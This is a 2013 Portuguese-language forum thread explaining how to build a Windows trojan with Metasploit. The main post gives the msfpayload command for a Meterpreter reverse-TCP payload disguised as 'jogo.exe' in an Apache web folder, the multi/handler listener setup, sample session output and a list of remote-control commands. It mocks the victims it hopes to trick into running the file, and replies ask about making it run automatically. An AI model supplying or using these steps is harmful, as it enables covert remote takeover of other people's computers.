seja bem vindo ao forum eof, caso nao seja cadastrado se cadastre para poder visualizar todo o conteudo ^^

Participe do fórum, é rápido e fácil

seja bem vindo ao forum eof, caso nao seja cadastrado se cadastre para poder visualizar todo o conteudo ^^
Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.

Você não está conectado. Conecte-se ou registre-se

Criando Trojan para Windows com Metasploit

3 participantes

Ir para baixo  Mensagem [Página 1 de 1]

1Criando Trojan para Windows com Metasploit Empty Criando Trojan para Windows com Metasploit Sáb Fev 16, 2013 7:23 am

MysteryMind

MysteryMind
avançado
avançado

E aew galera fiz um video aqui mostrando como criar Trojans com o metasploit
Bom aumentei a velocidade do video em 2,75 vezes intão ficou meio rapido mas da para intender
aqui ta o link do video mas vou explicar como fazer la em baixo tbm pq o video teve varios erros


APesar do video vou explicar por aqui tbm nós vamos criar o trojan e ja vamos joga-lo direto na pasta do apache
Primeiro só relembrando pra vcs que caso estejam utilizando alguma maquina virtual ela tem que estar configurada em modo bridge
Caso ja tenha o metasploit instalado na sua maquina vamos começar
Lembre de nao confundir seu ip antes de ifconfig no teminal para ver depois abra outro e vamos iniciar

msfpayload windows/meterpreter/reverse_tcp LHOST=seu ip LPORT=porta onde vai receber X> pasta onde vai ir o trojan/trojan.exe
Um exemplo de como pode ficar o comando
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.7.14 LPORT=4444 X>/var/www/jogo.exe

Com isso iriamos criar o trojan fazendo a conexão reversa para o ip 192.168.7.14 na porta 4444 e jogariamos o trojan na pasta /var/www como o arquivo jogo.exe, jogando o trojan na pasta /var/www ja facilita muita coisa pois podemos ja iniciar o apache e o trojan ja estaria la pronto pra algum burro fazer o download.

Mas antes de fazer tudo isso não é apenas a pessoa clicar vc tem que preparar a ratoera antes de pegar o rato intão vamos deixar o metasploit de escuta na porta 4444 onde colocamos o trojan com os seguintes comandos


msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST=o ip q vc pos antes
set LPORT=a porta q vc pos antes
exploit

Pronto agora esta tudo armado vamos ligar o apache e mandar o trojan pra alguem
primeiro ligue o apache com o comando
/etc/init.d/apache2 start

Pronto seu apache ta ligado o metasploit está de esculta agora é simplesmente fazer a pessoa baixar o arquivo pelo seguinte link
seu ip/nome do arquivo de virus
Exemplo:192.168.7.14/jogo.exe

Com isso tudo pronto agora vc enviara o trojan para alguem suponhamos que ele aceite e execute o trojan no mesmo momento va no metasploit estara algo semelhante a isso:

Started reverse handler on 192.168.7.14:4444...
Sending the payload Handler....
Sendind Stage (75281 bytes) to 192.168.1.46
Meterpreter session 1 opened (192.168.7.14:4444 -> 192.168.1.46:1101) at 2013-02-15 20:43
meterpreter>

Com isso esta tudo pronto o computador ja fez a conexao reversa com o seu pc e vc ja pode executar comandos remotos no computador
Bom aqui vou mostrar alguns comandos:


Help - Mostra todos os comandos
cd - muda a pasta
ls - ve os arquivos da pásta atual
screenshot- tira um print screen da tela do alvo e te manda
cat - pega arquivos exemplo: cat /etc/passwd obviamente isso no windows nao vai funcionar
shutdown - desliga o computador
shell- tenta simular uma shell no sistema
ps- mostra processos ativos
kill - mata processos
pwd - mostra a pasta atual
reboot - reinicia o computador
execute - executa um programa no computador remoto
Bom galera isso ai foi o basico espero que tenham gostado vlw!!!

cris_greg

cris_greg
novato
novato

Legal, ja tinha visto isso, nunca fucionou aqui :s. Não funciona pra net via radio ne?
Você sabe se tem como tipo, o cara baixar e o programa se alto-execultar?

MysteryMind

MysteryMind
avançado
avançado

o Seguinte cris_greg funciona sim cara o problema é o seguinte provavelmente vc ta rodando o metasploit em uma maquina virtual e sua placa de rede é NAT sua solução é colocar a placa em modo bridge bem simples em modo NAT nao ia funcionar ja tive seu mesmo problema...

0x06

0x06
postador
postador

todos os virus, malwares, inclusive trojans só são executados com a interação do usuario, e não automaticamente...

Conteúdo patrocinado



Ir para o topo  Mensagem [Página 1 de 1]

Permissões neste sub-fórum
Não podes responder a tópicos